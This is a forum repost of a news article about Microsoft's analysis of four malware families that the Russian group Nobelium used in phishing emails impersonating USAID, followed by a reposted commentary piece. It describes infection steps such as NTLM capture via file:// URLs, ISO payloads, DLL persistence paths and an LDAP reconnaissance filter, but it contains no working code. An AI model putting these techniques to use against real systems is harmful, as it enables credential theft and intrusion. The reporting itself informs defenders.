Jump to content
  • Microsoft: Russian hackers used 4 new malware in USAID phishing

    Karlston

    • 1 comment
    • 1.4k views
    • 4 minutes
     Share


    • 1 comment
    • 1.4k views
    • 4 minutes

    Microsoft: Russian hackers used 4 new malware in USAID phishing

     

    Microsoft states that a Russian hacking group used four new malware families in recent phishing attacks impersonating the United States Agency for International Development (USAID).

     

    Thursday night, the Microsoft Threat Intelligence Center (MSTIC) disclosed that the Russian-backed hacking group APT29, also known as Nobelium, had compromised the Contact Contact account for USAID.

     

    Using this legitimate marketing account, the threat actors impersonated USAID in phishing emails sent to approximately 3,000 email accounts at more than 150 different organizations, including government agencies and organizations devoted to international development, humanitarian, and human rights work.

    Targeting phishing emails pretending to be from USAID
    Targeting phishing emails pretending to be from USAID

    New malware used by Nobelium

    In a second blog post released Friday night, Microsoft provides details on four new malware families used by Nobelium in these recent attacks.

     

    The four new families include an HTML attachment named 'EnvyScout', a downloader known as 'BoomBox,' a loader known as 'NativeZone', and a shellcode downloader and launcher named 'VaporRage.'

    EnvyScout

    EnvyScout is a malicious HTML/JS file attachment used in spear-phishing emails that attempts to steal the NTLM credentials of Windows accounts and drops a malicious ISO on a victim's device.

     

    Distributed as a file named NV.html, when opened, the HTML file will attempt to load an image from a file:// URL. When doing this, Windows may send the logged-in user's Windows NTLM credentials to the remote site, which attackers can capture and brute-force to reveal the plain text password.

    Loading a remote image using the file:// URL
    Loading a remote image using the file:// URL

    Microsoft states that the attachment is also used to convert an embedded text blob into a malicious ISO saved as NV.img to the local file system.

    NV.html attachment saving the ISO image
    NV.html attachment saving the ISO image

    "At this stage of infection, the user is expected to open the downloaded ISO, NV.img, by double clicking it," explains Microsoft.

     

    When the ISO image opens, Windows will show the user a shortcut named NV that executes the hidden BOOM.exe, which is part of the new BoomBox malware family described below.

    Contents of NV.img ISO file
    Contents of NV.img ISO file

    Security researcher Florian Roth discovered another phishing campaign pretending to be from the Embassy of Belgium using this same malware attachment.

    Phishing campaign impersonating the Embassy of Belgium
    Phishing campaign impersonating the Embassy of Belgium

    BoomBox

    Microsoft is tracking the BOOM.exe file in the ISO image as 'BoomBox,' and states that it is used to download two encrypted malware files to the infected device from DropBox.

     

    After decrypting the downloaded files, BoomBox will save them as %AppData%MicrosoftNativeCacheNativeCacheSvc.dll and %AppData%SystemCertificatesCertPKIProvider.dll, and execute them using rundll32.exe.

     

    NativeCacheSvc.dll is configured to launch automatically when a user logs into Windows and is used to launch CertPKIProvider.dll.

     

    As a final stage, the BoomBox malware will gather information about the Windows domain, encrypts the collected data, and then sends it to a remote server under the attacker's control.

     

    "As the final reconnaissance step, if the system is domain-joined, BoomBox executes an LDAP query to gather data such as distinguished name, SAM account name, email, and display name of all domain users via the filter (&(objectClass=user)(objectCategory=person))," Microsoft explains.

    NativeZone

    Microsoft detects the NativeCacheSvc.dll file as a new malware loader called 'NativeZone.' 

     

    This malware is dropped and configured by BoomBox to start automatically when a user logs into Windows.

     

    When started via rundll32.exe, it will launch the CertPKIProvider.dll malware that Microsoft detects as 'VaporRage.'

    VaporRage

    The fourth malware used in these attacks is called 'VaporRage,' and it is the CertPKIProvider.dll file described in the previous NativeZone section.

     

    When launched, the malware will connect back to a remote command and control server, where it will register itself with the attackers and then repeatedly connect back to the remote site for a shellcode to download.

     

    When shellcodes are downloaded, the malware will execute them to perform various malicious activities, including the deployment of Cobalt Strike beacons.

    The same group behind SolarWinds attack

    The hacking group behind these attacks is believed to be the same group behind the SolarWinds supply-chain attack.

     

    This group is tracked as Nobelium (Microsoft), NC2452 (FireEye), StellarParticle (CrowdStrike), SolarStorm (Palo Alto Unit 42), and Dark Halo (Volexity).

     

    SolarWinds stated that the attack cost them $3.5 million in expenses but is expecting additional costs as time goes on.

     

    The US government formally accused the Russian Foreign Intelligence Service (tracked as APT29, The Dukes, or Cozy Bear) as the group behind the SolarWinds attack.

     

     

    Microsoft: Russian hackers used 4 new malware in USAID phishing

    • Like 3

    User Feedback

    Recommended Comments

    The SolarWinds hackers aren’t back—they never went away

    A new phishing campaign is less an escalation than a regression to the mean.

    "And people reliably click on these emails? Really?"
    Enlarge / "And people reliably click on these emails? Really?"
    Kremlin official photo

    The Russian hackers who breached SolarWinds IT management software to compromise a slew of United States government agencies and businesses are back in the limelight. Microsoft said on Thursday that the same “Nobelium” spy group has built out an aggressive phishing campaign since January of this year and ramped it up significantly this week, targeting roughly 3,000 individuals at more than 150 organizations in 24 countries.

     

    The revelation caused a stir, highlighting as it did Russia's ongoing and inveterate digital espionage campaigns. But it should be no shock at all that Russia in general, and the SolarWinds hackers in particular, have continued to spy even after the US imposed retaliatory sanctions in April. And relative to SolarWinds, a phishing campaign seems downright ordinary.

     

    “I don’t think it’s an escalation, I think it’s business as usual,” says John Hultquist, vice president of intelligence analysis at the security firm FireEye, which first discovered the SolarWinds intrusions. “I don’t think they’re deterred and I don’t think they’re likely to be deterred.”

     

    Russia's latest campaign is certainly worth calling out. Nobelium compromised legitimate accounts from the bulk email service Constant Contact, including that of the United States Agency for International Development. From there the hackers, reportedly members of Russia's SVR foreign intelligence agency, could send out specially crafted spear-phishing emails that genuinely came from the email accounts of the organization they were impersonating. The emails included legitimate links that then redirected to malicious Nobelium infrastructure and installed malware to take control of target devices.

     

    While the number of targets seems large, and USAID works with plenty of people in sensitive positions, the actual impact may not be quite as severe as it first sounds. While Microsoft acknowledges that some messages may have gotten through, the company says that automated spam systems blocked many of the phishing messages. Microsoft corporate vice president for customer security and trust Tom Burt wrote in a blog post on Thursday that the company views the activity as “sophisticated” and that Nobelium evolved and refined its strategy for the campaign for months leading up to this week's targeting.

     

    “It is likely that these observations represent changes in the actor’s tradecraft and possible experimentation following widespread disclosures of previous incidents,” Burt wrote. In other words, this could be a pivot after their SolarWinds cover was blown.

     

    But the tactics in this latest phishing campaign also reflect Nobelium's general practice of establishing access on one system or account and then using it to gain access to others and leapfrog to numerous targets. It's a spy agency; this is what it does as a matter of course.

     

    “If this happened pre-SolarWinds we wouldn’t have thought anything about it. It’s only the context of SolarWinds that makes us see it differently," says Jason Healey, a former Bush White House staffer and current cyberconflict researcher at Columbia University. “Let’s say this incident happens in 2019 or 2020, I don’t think anyone is going to blink an eye at this.”

     

    As Microsoft points out, there's also nothing unexpected about Russian spies, and Nobelium in particular, targeting government agencies, USAID in particular, NGOs, think tanks, research groups, or military and IT service contractors.

     

    “NGOs and DC think tanks have been high-value soft targets for decades,” says one former Department of Homeland Security cybersecurity consultant. “And it's an open secret in the incident response world that USAID and the State Department are a mess of unaccountable, subcontracted IT networks and infrastructure. In the past, some of those systems were compromised for years."

     

    Especially compared to the scope and sophistication of the SolarWinds breach, a widespread phishing campaign feels almost like a downshift. It's also important to remember that the impacts of SolarWinds remain ongoing; even after months of publicity about the incident, it's likely that Nobelium still haunts at least some of the systems it compromised during that effort.

     

    “I’m sure that they’ve still got accesses in some places from the SolarWinds campaign,” FireEye’s Hultquist says. “The main thrust of the activity has been diminished, but they’re very likely lingering on in several places.”

     

    Which is just the reality of digital espionage. It doesn't stop and start based on public shaming. Nobelium's activity is certainly unwelcome, but it doesn't in itself portend some great escalation.

     

    Additional reporting by Andy Greenberg. This story originally appeared on wired.com.

     

     

    The SolarWinds hackers aren’t back—they never went away

    • Like 2
    Link to comment
    Share on other sites




    Join the conversation

    You can post now and register later. If you have an account, sign in now to post with your account.
    Note: Your post will require moderator approval before it will be visible.

    Guest
    Add a comment...

    ×   Pasted as rich text.   Paste as plain text instead

      Only 75 emoji are allowed.

    ×   Your link has been automatically embedded.   Display as a link instead

    ×   Your previous content has been restored.   Clear editor

    ×   You cannot paste images directly. Upload or insert images from URL.


  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...